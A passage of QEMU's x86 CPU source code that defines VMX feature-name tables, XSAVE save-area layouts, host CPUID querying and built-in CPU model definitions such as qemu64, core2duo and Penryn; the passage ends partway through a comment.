"vmx-vmfunc", "vmx-shadow-vmcs", "vmx-encls-exit", "vmx-rdseed-exit", "vmx-pml", NULL, NULL, "vmx-xsaves", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, }, .msr = { .index = 
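/* the secondary processor-based VM-execution controls are reported via this MSR: */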
MSR_IA32_VMX_PROCBASED_CTLS2, } }, [FEAT_VMX_PINBASED_CTLS] = { .type = MSR_FEATURE_WORD, .feat_names = { "vmx-intr-exit", NULL, NULL, "vmx-nmi-exit", NULL, "vmx-vnmi", "vmx-preemption-timer", "vmx-posted-intr", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, }, .msr = { .index = MSR_IA32_VMX_TRUE_PINBASED_CTLS, } }, [FEAT_VMX_EXIT_CTLS] = { .type = MSR_FEATURE_WORD, /* * VMX_VM_EXIT_HOST_ADDR_SPACE_SIZE is copied from * the LM CPUID bit. */ .feat_names = { NULL, NULL, "vmx-exit-nosave-debugctl", NULL, NULL, NULL, NULL, NULL, NULL, NULL /* vmx-exit-host-addr-space-size */, NULL, NULL, "vmx-exit-load-perf-global-ctrl", NULL, NULL, "vmx-exit-ack-intr", NULL, NULL, "vmx-exit-save-pat", "vmx-exit-load-pat", "vmx-exit-save-efer", "vmx-exit-load-efer", "vmx-exit-save-preemption-timer", "vmx-exit-clear-bndcfgs", NULL, "vmx-exit-clear-rtit-ctl", NULL, NULL, NULL, NULL, NULL, NULL, }, .msr = { .index = MSR_IA32_VMX_TRUE_EXIT_CTLS, } }, [FEAT_VMX_ENTRY_CTLS] = { .type = MSR_FEATURE_WORD, .feat_names = { NULL, NULL, "vmx-entry-noload-debugctl", NULL, NULL, NULL, NULL, NULL, NULL, "vmx-entry-ia32e-mode", NULL, NULL, NULL, "vmx-entry-load-perf-global-ctrl", "vmx-entry-load-pat", "vmx-entry-load-efer", "vmx-entry-load-bndcfgs", NULL, "vmx-entry-load-rtit-ctl", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, }, .msr = { .index = MSR_IA32_VMX_TRUE_ENTRY_CTLS, } }, [FEAT_VMX_MISC] = { .type = MSR_FEATURE_WORD, .feat_names = { NULL, NULL, NULL, NULL, NULL, "vmx-store-lma", "vmx-activity-hlt", "vmx-activity-shutdown", "vmx-activity-wait-sipi", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, "vmx-vmwrite-vmexit-fields", "vmx-zero-len-inject", NULL, }, .msr = { .index = MSR_IA32_VMX_MISC, } }, [FEAT_VMX_EPT_VPID_CAPS] = { .type = MSR_FEATURE_WORD, .feat_names = { "vmx-ept-execonly", NULL, NULL, NULL, NULL, NULL, "vmx-page-walk-4", "vmx-page-walk-5", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, "vmx-ept-2mb", "vmx-ept-1gb", NULL, NULL, "vmx-invept", "vmx-eptad", "vmx-ept-advanced-exitinfo", NULL, NULL, "vmx-invept-single-context", "vmx-invept-all-context", NULL, NULL, NULL, NULL, NULL, "vmx-invvpid", NULL, NULL, NULL, NULL, NULL, NULL, NULL, "vmx-invvpid-single-addr", "vmx-invept-single-context", "vmx-invvpid-all-context", "vmx-invept-single-context-noglobals", NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, NULL, }, .msr = { .index = MSR_IA32_VMX_EPT_VPID_CAP, } }, [FEAT_VMX_BASIC] = { .type = MSR_FEATURE_WORD, .feat_names = { [54] = "vmx-ins-outs", [55] = "vmx-true-ctls", }, .msr = { .index = MSR_IA32_VMX_BASIC, }, /* Just to be safe - we don't support setting the MSEG version field. 
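Keeping MSR_VMX_BASIC_DUAL_MONITOR in no_autoenable_flags below means dual-monitor treatment is never advertised implicitly; it would have to be requested explicitly.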
*/ .no_autoenable_flags = MSR_VMX_BASIC_DUAL_MONITOR, }, [FEAT_VMX_VMFUNC] = { .type = MSR_FEATURE_WORD, .feat_names = { [0] = "vmx-eptp-switching", }, .msr = { .index = MSR_IA32_VMX_VMFUNC, } }, }; typedef enum X86CPURegister32 { X86_CPU_REGISTER32_EAX = 0, X86_CPU_REGISTER32_EBX = 1, X86_CPU_REGISTER32_ECX = 2, X86_CPU_REGISTER32_EDX = 3, X86_CPU_REGISTER32_ESP = 4, X86_CPU_REGISTER32_EBP = 5, X86_CPU_REGISTER32_ESI = 6, X86_CPU_REGISTER32_EDI = 7, X86_CPU_REGISTER32_MAX = 8, } X86CPURegister32; typedef struct X86RegisterInfo32 { /* Name of register */ const char *name; /* QAPI enum value register */ X86CPURegister32 qapi_enum; } X86RegisterInfo32; #define REGISTER(reg) \ [R_##reg] = { .name = #reg, .qapi_enum = X86_CPU_REGISTER32_##reg } static const X86RegisterInfo32 x86_reg_info_32[CPU_NB_REGS32] = { REGISTER(EAX), REGISTER(ECX), REGISTER(EDX), REGISTER(EBX), REGISTER(ESP), REGISTER(EBP), REGISTER(ESI), REGISTER(EDI), }; #undef REGISTER typedef struct ExtSaveArea { uint32_t feature, bits; uint32_t offset, size; } ExtSaveArea; static const ExtSaveArea x86_ext_save_areas[] = { [XSTATE_FP_BIT] = { /* x87 FP state component is always enabled if XSAVE is supported */ .feature = FEAT_1_ECX, .bits = CPUID_EXT_XSAVE, /* x87 state is in the legacy region of the XSAVE area */ .offset = 0, .size = sizeof(X86LegacyXSaveArea) + sizeof(X86XSaveHeader), }, [XSTATE_SSE_BIT] = { /* SSE state component is always enabled if XSAVE is supported */ .feature = FEAT_1_ECX, .bits = CPUID_EXT_XSAVE, /* SSE state is in the legacy region of the XSAVE area */ .offset = 0, .size = sizeof(X86LegacyXSaveArea) + sizeof(X86XSaveHeader), }, [XSTATE_YMM_BIT] = { .feature = FEAT_1_ECX, .bits = CPUID_EXT_AVX, .offset = offsetof(X86XSaveArea, avx_state), .size = sizeof(XSaveAVX) }, [XSTATE_BNDREGS_BIT] = { .feature = FEAT_7_0_EBX, .bits = CPUID_7_0_EBX_MPX, .offset = offsetof(X86XSaveArea, bndreg_state), .size = sizeof(XSaveBNDREG) }, [XSTATE_BNDCSR_BIT] = { .feature = FEAT_7_0_EBX, .bits = CPUID_7_0_EBX_MPX, .offset = offsetof(X86XSaveArea, bndcsr_state), .size = sizeof(XSaveBNDCSR) }, [XSTATE_OPMASK_BIT] = { .feature = FEAT_7_0_EBX, .bits = CPUID_7_0_EBX_AVX512F, .offset = offsetof(X86XSaveArea, opmask_state), .size = sizeof(XSaveOpmask) }, [XSTATE_ZMM_Hi256_BIT] = { .feature = FEAT_7_0_EBX, .bits = CPUID_7_0_EBX_AVX512F, .offset = offsetof(X86XSaveArea, zmm_hi256_state), .size = sizeof(XSaveZMM_Hi256) }, [XSTATE_Hi16_ZMM_BIT] = { .feature = FEAT_7_0_EBX, .bits = CPUID_7_0_EBX_AVX512F, .offset = offsetof(X86XSaveArea, hi16_zmm_state), .size = sizeof(XSaveHi16_ZMM) }, [XSTATE_PKRU_BIT] = { .feature = FEAT_7_0_ECX, .bits = CPUID_7_0_ECX_PKU, .offset = offsetof(X86XSaveArea, pkru_state), .size = sizeof(XSavePKRU) }, }; static uint32_t xsave_area_size(uint64_t mask) { int i; uint64_t ret = 0; for (i = 0; i < ARRAY_SIZE(x86_ext_save_areas); i++) { const ExtSaveArea *esa = &x86_ext_save_areas[i]; if ((mask >> i) & 1) { ret = MAX(ret, esa->offset + esa->size); } } return ret; } static inline bool accel_uses_host_cpuid(void) { return false; } static inline uint64_t x86_cpu_xsave_components(X86CPU *cpu) { return ((uint64_t)cpu->env.features[FEAT_XSAVE_COMP_HI]) << 32 | cpu->env.features[FEAT_XSAVE_COMP_LO]; } const char *get_register_name_32(unsigned int reg) { if (reg >= CPU_NB_REGS32) { return NULL; } return x86_reg_info_32[reg].name; } void host_cpuid(uint32_t function, uint32_t count, uint32_t *eax, uint32_t *ebx, uint32_t *ecx, uint32_t *edx) { uint32_t vec[4]; #ifdef _MSC_VER __cpuidex((int*)vec, function, count); #else 
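/* non-MSVC path: inline cpuid; the i386 variant below saves everything with pusha/popa, presumably so that EBX (which can be reserved as the PIC register) need not appear in the clobber list */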
#ifdef __x86_64__ asm volatile("cpuid" : "=a"(vec[0]), "=b"(vec[1]), "=c"(vec[2]), "=d"(vec[3]) : "0"(function), "c"(count) : "cc"); #elif defined(__i386__) asm volatile("pusha \n\t" "cpuid \n\t" "mov %%eax, 0(%2) \n\t" "mov %%ebx, 4(%2) \n\t" "mov %%ecx, 8(%2) \n\t" "mov %%edx, 12(%2) \n\t" "popa" : : "a"(function), "c"(count), "S"(vec) : "memory", "cc"); #else abort(); #endif #endif // _MSC_VER if (eax) *eax = vec[0]; if (ebx) *ebx = vec[1]; if (ecx) *ecx = vec[2]; if (edx) *edx = vec[3]; } void host_vendor_fms(char *vendor, int *family, int *model, int *stepping) { uint32_t eax, ebx, ecx, edx; host_cpuid(0x0, 0, &eax, &ebx, &ecx, &edx); host_cpuid(0x1, 0, &eax, &ebx, &ecx, &edx); if (family) { *family = ((eax >> 8) & 0x0F) + ((eax >> 20) & 0xFF); } if (model) { *model = ((eax >> 4) & 0x0F) | ((eax & 0xF0000) >> 12); } if (stepping) { *stepping = eax & 0x0F; } } typedef struct PropValue { const char *prop, *value; } PropValue; typedef struct X86CPUVersionDefinition { X86CPUVersion version; const char *alias; const char *note; PropValue *props; } X86CPUVersionDefinition; /* Base definition for a CPU model */ typedef struct X86CPUDefinition { const char *name; uint32_t level; uint32_t xlevel; /* vendor is zero-terminated, 12 character ASCII string */ char vendor[CPUID_VENDOR_SZ + 1]; int family; int model; int stepping; FeatureWordArray features; const char *model_id; CPUCaches *cache_info; /* Use AMD EPYC encoding for apic id */ bool use_epyc_apic_id_encoding; /* * Definitions for alternative versions of CPU model. * List is terminated by item with version == 0. * If NULL, version 1 will be registered automatically. */ const X86CPUVersionDefinition *versions; } X86CPUDefinition; /* Reference to a specific CPU model version */ struct X86CPUModel { /* Base CPU definition */ X86CPUDefinition *cpudef; /* CPU model version */ X86CPUVersion version; const char *note; /* * If true, this is an alias CPU model. 
* This matters only for "-cpu help" and query-cpu-definitions */ bool is_alias; }; static CPUCaches epyc_cache_info = { .l1d_cache = &(CPUCacheInfo) { .type = DATA_CACHE, .level = 1, .size = 32 * KiB, .line_size = 64, .associativity = 8, .partitions = 1, .sets = 64, .lines_per_tag = 1, .self_init = 1, .no_invd_sharing = true, }, .l1i_cache = &(CPUCacheInfo) { .type = INSTRUCTION_CACHE, .level = 1, .size = 64 * KiB, .line_size = 64, .associativity = 4, .partitions = 1, .sets = 256, .lines_per_tag = 1, .self_init = 1, .no_invd_sharing = true, }, .l2_cache = &(CPUCacheInfo) { .type = UNIFIED_CACHE, .level = 2, .size = 512 * KiB, .line_size = 64, .associativity = 8, .partitions = 1, .sets = 1024, .lines_per_tag = 1, }, .l3_cache = &(CPUCacheInfo) { .type = UNIFIED_CACHE, .level = 3, .size = 8 * MiB, .line_size = 64, .associativity = 16, .partitions = 1, .sets = 8192, .lines_per_tag = 1, .self_init = true, .inclusive = true, .complex_indexing = true, }, }; static CPUCaches epyc_rome_cache_info = { .l1d_cache = &(CPUCacheInfo) { .type = DATA_CACHE, .level = 1, .size = 32 * KiB, .line_size = 64, .associativity = 8, .partitions = 1, .sets = 64, .lines_per_tag = 1, .self_init = 1, .no_invd_sharing = true, }, .l1i_cache = &(CPUCacheInfo) { .type = INSTRUCTION_CACHE, .level = 1, .size = 32 * KiB, .line_size = 64, .associativity = 8, .partitions = 1, .sets = 64, .lines_per_tag = 1, .self_init = 1, .no_invd_sharing = true, }, .l2_cache = &(CPUCacheInfo) { .type = UNIFIED_CACHE, .level = 2, .size = 512 * KiB, .line_size = 64, .associativity = 8, .partitions = 1, .sets = 1024, .lines_per_tag = 1, }, .l3_cache = &(CPUCacheInfo) { .type = UNIFIED_CACHE, .level = 3, .size = 16 * MiB, .line_size = 64, .associativity = 16, .partitions = 1, .sets = 16384, .lines_per_tag = 1, .self_init = true, .inclusive = true, .complex_indexing = true, }, }; /* The following VMX features are not supported by KVM and are left out in the * CPU definitions: * * Dual-monitor support (all processors) * Entry to SMM * Deactivate dual-monitor treatment * Number of CR3-target values * Shutdown activity state * Wait-for-SIPI activity state * PAUSE-loop exiting (Westmere and newer) * EPT-violation #VE (Broadwell and newer) * Inject event with insn length=0 (Skylake and newer) * Conceal non-root operation from PT * Conceal VM exits from PT * Conceal VM entries from PT * Enable ENCLS exiting * Mode-based execute control (XS/XU) * TSC scaling (Skylake Server and newer) * GPA translation for PT (IceLake and newer) * User wait and pause * ENCLV exiting * Load IA32_RTIT_CTL * Clear IA32_RTIT_CTL * Advanced VM-exit information for EPT violations * Sub-page write permissions * PT in VMX operation */ static X86CPUDefinition builtin_x86_defs[] = { { .name = "qemu64", .level = 0xd, .vendor = CPUID_VENDOR_AMD, .family = 6, .model = 6, .stepping = 3, .features[FEAT_1_EDX] = PPRO_FEATURES | CPUID_MTRR | CPUID_CLFLUSH | CPUID_MCA | CPUID_PSE36, .features[FEAT_1_ECX] = CPUID_EXT_SSE3 | CPUID_EXT_CX16, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_SYSCALL | CPUID_EXT2_NX, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_LAHF_LM | CPUID_EXT3_SVM, .xlevel = 0x8000000A, .model_id = "QEMU Virtual CPU version " QEMU_HW_VERSION, }, { .name = "phenom", .level = 5, .vendor = CPUID_VENDOR_AMD, .family = 16, .model = 2, .stepping = 3, /* Missing: CPUID_HT */ .features[FEAT_1_EDX] = PPRO_FEATURES | CPUID_MTRR | CPUID_CLFLUSH | CPUID_MCA | CPUID_PSE36 | CPUID_VME, .features[FEAT_1_ECX] = CPUID_EXT_SSE3 | CPUID_EXT_MONITOR | CPUID_EXT_CX16 |
CPUID_EXT_POPCNT, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_SYSCALL | CPUID_EXT2_NX | CPUID_EXT2_3DNOW | CPUID_EXT2_3DNOWEXT | CPUID_EXT2_MMXEXT | CPUID_EXT2_FFXSR | CPUID_EXT2_PDPE1GB | CPUID_EXT2_RDTSCP, /* Missing: CPUID_EXT3_CMP_LEG, CPUID_EXT3_EXTAPIC, CPUID_EXT3_CR8LEG, CPUID_EXT3_MISALIGNSSE, CPUID_EXT3_3DNOWPREFETCH, CPUID_EXT3_OSVW, CPUID_EXT3_IBS */ .features[FEAT_8000_0001_ECX] = CPUID_EXT3_LAHF_LM | CPUID_EXT3_SVM | CPUID_EXT3_ABM | CPUID_EXT3_SSE4A, /* Missing: CPUID_SVM_LBRV */ .features[FEAT_SVM] = CPUID_SVM_NPT, .xlevel = 0x8000001A, .model_id = "AMD Phenom(tm) 9550 Quad-Core Processor" }, { .name = "core2duo", .level = 10, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 15, .stepping = 11, /* Missing: CPUID_DTS, CPUID_HT, CPUID_TM, CPUID_PBE */ .features[FEAT_1_EDX] = PPRO_FEATURES | CPUID_MTRR | CPUID_CLFLUSH | CPUID_MCA | CPUID_PSE36 | CPUID_VME | CPUID_ACPI | CPUID_SS, /* Missing: CPUID_EXT_DTES64, CPUID_EXT_DSCPL, CPUID_EXT_EST, * CPUID_EXT_TM2, CPUID_EXT_XTPR, CPUID_EXT_PDCM, CPUID_EXT_VMX */ .features[FEAT_1_ECX] = CPUID_EXT_SSE3 | CPUID_EXT_MONITOR | CPUID_EXT_SSSE3 | CPUID_EXT_CX16, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_SYSCALL | CPUID_EXT2_NX, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_LAHF_LM, .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES, .xlevel = 0x80000008, .model_id = "Intel(R) Core(TM)2 Duo CPU T7700 @ 2.40GHz", }, { .name = "kvm64", .level = 0xd, .vendor = CPUID_VENDOR_INTEL, .family = 15, .model = 6, .stepping = 1, /* Missing: CPUID_HT */ .features[FEAT_1_EDX] = PPRO_FEATURES | CPUID_VME | CPUID_MTRR | CPUID_CLFLUSH | CPUID_MCA | CPUID_PSE36, /* Missing: CPUID_EXT_POPCNT, CPUID_EXT_MONITOR */ .features[FEAT_1_ECX] = CPUID_EXT_SSE3 | CPUID_EXT_CX16, /* Missing: CPUID_EXT2_PDPE1GB, CPUID_EXT2_RDTSCP */ .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_SYSCALL | CPUID_EXT2_NX, /* Missing: CPUID_EXT3_LAHF_LM, CPUID_EXT3_CMP_LEG, CPUID_EXT3_EXTAPIC, CPUID_EXT3_CR8LEG, CPUID_EXT3_ABM, CPUID_EXT3_SSE4A, CPUID_EXT3_MISALIGNSSE, CPUID_EXT3_3DNOWPREFETCH, CPUID_EXT3_OSVW, CPUID_EXT3_IBS, CPUID_EXT3_SVM */ .features[FEAT_8000_0001_ECX] = 0, /* VMX features from Cedar Mill/Prescott */ .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | 
VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING, .xlevel = 0x80000008, .model_id = "Common KVM processor" }, { .name = "qemu32", .level = 4, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 6, .stepping = 3, .features[FEAT_1_EDX] = PPRO_FEATURES, .features[FEAT_1_ECX] = CPUID_EXT_SSE3, .xlevel = 0x80000004, .model_id = "QEMU Virtual CPU version " QEMU_HW_VERSION, }, { .name = "kvm32", .level = 5, .vendor = CPUID_VENDOR_INTEL, .family = 15, .model = 6, .stepping = 1, .features[FEAT_1_EDX] = PPRO_FEATURES | CPUID_VME | CPUID_MTRR | CPUID_CLFLUSH | CPUID_MCA | CPUID_PSE36, .features[FEAT_1_ECX] = CPUID_EXT_SSE3, .features[FEAT_8000_0001_ECX] = 0, /* VMX features from Yonah */ .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_USE_MSR_BITMAPS, .xlevel = 0x80000008, .model_id = "Common 32-bit KVM processor" }, { .name = "coreduo", .level = 10, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 14, .stepping = 8, /* Missing: CPUID_DTS, CPUID_HT, CPUID_TM, CPUID_PBE */ .features[FEAT_1_EDX] = PPRO_FEATURES | CPUID_VME | CPUID_MTRR | CPUID_CLFLUSH | CPUID_MCA | CPUID_ACPI | CPUID_SS, /* Missing: CPUID_EXT_EST, CPUID_EXT_TM2 , CPUID_EXT_XTPR, * CPUID_EXT_PDCM, CPUID_EXT_VMX */ .features[FEAT_1_ECX] = CPUID_EXT_SSE3 | CPUID_EXT_MONITOR, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_NX, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_USE_MSR_BITMAPS, .xlevel = 0x80000008, .model_id = "Genuine Intel(R) CPU T2600 @ 2.16GHz", }, { .name = "486", .level = 1, .vendor = CPUID_VENDOR_INTEL, .family = 4, .model = 8, .stepping = 0, .features[FEAT_1_EDX] = I486_FEATURES, .xlevel = 0, .model_id = "", }, { .name = "pentium", .level = 1, .vendor = CPUID_VENDOR_INTEL, .family = 5, .model = 4, .stepping = 3, .features[FEAT_1_EDX] = PENTIUM_FEATURES, .xlevel = 0, .model_id = "", }, { .name = "pentium2", .level = 2, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 5, 
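/*
 * Worked example (illustrative): .family, .model and .stepping are packed
 * into the CPUID.01H:EAX signature as stepping[3:0], model[7:4] and
 * family[11:8], with extended-model[19:16] and extended-family[27:20] used
 * when family is 6 or 15. So pentium2 here (family 6, model 5, stepping 2)
 * reports EAX = 0x000652, while SandyBridge (family 6, model 42 = 0x2A,
 * stepping 1) needs the extended-model nibble: EAX = 0x0206A1.
 */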
.stepping = 2, .features[FEAT_1_EDX] = PENTIUM2_FEATURES, .xlevel = 0, .model_id = "", }, { .name = "pentium3", .level = 3, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 7, .stepping = 3, .features[FEAT_1_EDX] = PENTIUM3_FEATURES, .xlevel = 0, .model_id = "", }, { .name = "athlon", .level = 2, .vendor = CPUID_VENDOR_AMD, .family = 6, .model = 2, .stepping = 3, .features[FEAT_1_EDX] = PPRO_FEATURES | CPUID_PSE36 | CPUID_VME | CPUID_MTRR | CPUID_MCA, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_MMXEXT | CPUID_EXT2_3DNOW | CPUID_EXT2_3DNOWEXT, .xlevel = 0x80000008, .model_id = "QEMU Virtual CPU version " QEMU_HW_VERSION, }, { .name = "n270", .level = 10, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 28, .stepping = 2, /* Missing: CPUID_DTS, CPUID_HT, CPUID_TM, CPUID_PBE */ .features[FEAT_1_EDX] = PPRO_FEATURES | CPUID_MTRR | CPUID_CLFLUSH | CPUID_MCA | CPUID_VME | CPUID_ACPI | CPUID_SS, /* Some CPUs got no CPUID_SEP */ /* Missing: CPUID_EXT_DSCPL, CPUID_EXT_EST, CPUID_EXT_TM2, * CPUID_EXT_XTPR */ .features[FEAT_1_ECX] = CPUID_EXT_SSE3 | CPUID_EXT_MONITOR | CPUID_EXT_SSSE3 | CPUID_EXT_MOVBE, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_NX, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_LAHF_LM, .xlevel = 0x80000008, .model_id = "Intel(R) Atom(TM) CPU N270 @ 1.60GHz", }, { .name = "Conroe", .level = 10, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 15, .stepping = 3, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_SSSE3 | CPUID_EXT_SSE3, .features[FEAT_8000_0001_EDX] = CPUID_EXT2_LM | CPUID_EXT2_NX | CPUID_EXT2_SYSCALL, .features[FEAT_8000_0001_ECX] = CPUID_EXT3_LAHF_LM, .features[FEAT_VMX_BASIC] = MSR_VMX_BASIC_INS_OUTS, .features[FEAT_VMX_ENTRY_CTLS] = VMX_VM_ENTRY_IA32E_MODE, .features[FEAT_VMX_EXIT_CTLS] = VMX_VM_EXIT_ACK_INTR_ON_EXIT, .features[FEAT_VMX_MISC] = MSR_VMX_MISC_ACTIVITY_HLT, .features[FEAT_VMX_PINBASED_CTLS] = VMX_PIN_BASED_EXT_INTR_MASK | VMX_PIN_BASED_NMI_EXITING | VMX_PIN_BASED_VIRTUAL_NMIS, .features[FEAT_VMX_PROCBASED_CTLS] = VMX_CPU_BASED_VIRTUAL_INTR_PENDING | VMX_CPU_BASED_USE_TSC_OFFSETING | VMX_CPU_BASED_HLT_EXITING | VMX_CPU_BASED_INVLPG_EXITING | VMX_CPU_BASED_MWAIT_EXITING | VMX_CPU_BASED_RDPMC_EXITING | VMX_CPU_BASED_RDTSC_EXITING | VMX_CPU_BASED_CR8_LOAD_EXITING | VMX_CPU_BASED_CR8_STORE_EXITING | VMX_CPU_BASED_TPR_SHADOW | VMX_CPU_BASED_MOV_DR_EXITING | VMX_CPU_BASED_UNCOND_IO_EXITING | VMX_CPU_BASED_USE_IO_BITMAPS | VMX_CPU_BASED_MONITOR_EXITING | VMX_CPU_BASED_PAUSE_EXITING | VMX_CPU_BASED_VIRTUAL_NMI_PENDING | VMX_CPU_BASED_USE_MSR_BITMAPS | VMX_CPU_BASED_ACTIVATE_SECONDARY_CONTROLS, .features[FEAT_VMX_SECONDARY_CTLS] = VMX_SECONDARY_EXEC_VIRTUALIZE_APIC_ACCESSES, .xlevel = 0x80000008, .model_id = "Intel Celeron_4x0 (Conroe/Merom Class Core 2)", }, { .name = "Penryn", .level = 10, .vendor = CPUID_VENDOR_INTEL, .family = 6, .model = 23, .stepping = 3, .features[FEAT_1_EDX] = CPUID_VME | CPUID_SSE2 | CPUID_SSE | CPUID_FXSR | CPUID_MMX | CPUID_CLFLUSH | CPUID_PSE36 | CPUID_PAT | CPUID_CMOV | CPUID_MCA | CPUID_PGE | CPUID_MTRR | CPUID_SEP | CPUID_APIC | CPUID_CX8 | CPUID_MCE | CPUID_PAE | CPUID_MSR | CPUID_TSC | CPUID_PSE | CPUID_DE | CPUID_FP87, .features[FEAT_1_ECX] = CPUID_EXT_SSE41 | CPUID_EXT_CX16 | CPUID_EXT_SSSE3 | CPUID_EXT_SSE3, .features[FEAT_8000_0001_EDX] = 
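/*
 * Background (summary, assuming standard CPUID semantics): .model_id is
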